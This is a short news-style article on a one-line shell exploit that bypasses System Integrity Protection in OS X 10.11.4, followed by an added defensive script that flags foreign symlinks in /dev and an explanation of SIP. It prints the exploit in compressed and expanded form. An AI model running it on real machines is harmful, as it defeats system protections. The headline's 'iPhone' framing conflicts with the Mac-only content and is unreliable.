iPhone Exploit So Easy it Fits in a Tweet

Did you install the latest update, OS X 10.11.4? If yes, then you might be vulnerable to an exploit that is so short it fits in a single tweet.

Hacking an iPhone has never been so easy. The exploit is the one-liner shown below:

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

The above code actually expands to:

ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot

The code bypasses Apple’s SIP technology, allowing the attacker to run processes as they please.
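The bypass above hinges on a symlink planted in /dev that points at a file under /System. The following audit helper, added here and not part of the original post, lists every symlink in a device directory whose target resolves outside that directory, which is how a defender would flag such an entry; it assumes a readlink that supports -f (GNU coreutils or macOS 12.3 and later).

```shell
#!/bin/sh
# Added audit helper (not from the original post). Flags symlinks inside a
# device directory whose resolved target lies outside it; the SIP bypass in
# the post relies on exactly such a link (/dev/diskX -> an Info.plist under
# /System/Library/Extensions). Assumes `readlink -f` is available.

# Print "link -> target" for each symlink directly inside $1 whose resolved
# target is outside $1. Returns 0 when none is found, 1 when at least one is.
find_foreign_dev_symlinks() {
    dir=$(readlink -f "$1") || return 2
    found=0
    for entry in "$dir"/*; do
        [ -L "$entry" ] || continue
        target=$(readlink -f "$entry") || target="(dangling)"
        case "$target" in
            "$dir"/*) ;;                 # resolves back into the directory: normal
            *) printf '%s -> %s\n' "$entry" "$target"; found=1 ;;
        esac
    done
    return $found
}

# Number of foreign symlinks in $1, convenient for scripting and tests.
count_foreign_dev_symlinks() {
    find_foreign_dev_symlinks "$1" | wc -l | tr -d ' '
}

# Stand-alone use: `sh audit.sh --run` audits the real /dev of this host.
if [ "${1:-}" = "--run" ]; then
    find_foreign_dev_symlinks /dev && echo "no foreign symlinks in /dev"
fi
```

A clean macOS /dev contains block and character devices plus a few links that stay within /dev, so any entry this prints deserves a look.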

What is SIP?

System Integrity Protection is a technology in OS X El Capitan (10.11) and later that prevents any application from modifying files and resources that reside in the System directory and certain other directories on your Mac. SIP prevents access to the following folders:

  • /System
  • /bin
  • /sbin
  • /usr (with the exception of /usr/local)
  • /Applications/Utilities

How Does it Work?

In addition to the user accounts that you have set up on your Mac, there are several other hidden users, one of which is “root.” If you ever use Activity Monitor (located in /Applications/Utilities) to check your CPU or memory usage, you may notice that some of the processes are owned by the root user (this applies to OS X Mavericks (10.9) and earlier).

You will notice that in later OS X versions, “root” is nowhere to be found.